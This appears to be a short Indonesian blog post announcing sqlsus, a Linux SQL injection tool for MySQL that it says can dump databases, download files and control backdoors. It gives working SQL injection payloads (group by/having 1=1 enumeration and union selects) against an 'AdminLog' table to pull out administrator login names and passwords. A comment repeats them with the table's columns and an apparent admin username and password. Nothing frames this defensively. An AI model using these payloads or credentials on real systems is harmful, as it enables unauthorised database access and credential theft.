Guys, Bagi yang suka mempelajari seputar security, tentu mengenal istilah SQL Injection. Selain SQLMap, saat ini untuk pengguna Linux sudah dirilis versi baru dari sqlsus, yang didesain untuk melakukan SQL Injection pada MySql database. Dengan tampilan command line menyerupai mysql console, kita bisa mendapatkan database structure, memasukkan SQL query, mendownload file dari web server upload dan control backdoor, dan masih banyak lagi…
'group by AdminLog.member_id,AdminLog.member_loginname,AdminLog.member_password,AdminLog.member_registered,AdminLog.member_visibility_status having 1=1--
' union select sum(member_password) from AdminLog--
' union select min(member_password),1,1,1,1 from AdminLog where member_loginname > 'a'--
1 komentar:
AdminLog.member_id(int)
AdminLog.member_loginname(char)
AdminLog.member_password
AdminLog.member_registered
AdminLog.member_visibility_status
'group by AdminLog.member_id,AdminLog.member_loginname,AdminLog.member_password,AdminLog.member_registered,AdminLog.member_visibility_status having 1=1--
' union select sum(member_password) from AdminLog--
' union select min(member_password),1,1,1,1 from AdminLog where member_loginname > 'a'--
user=admin
pas=!@#$%^&*(
Posting Komentar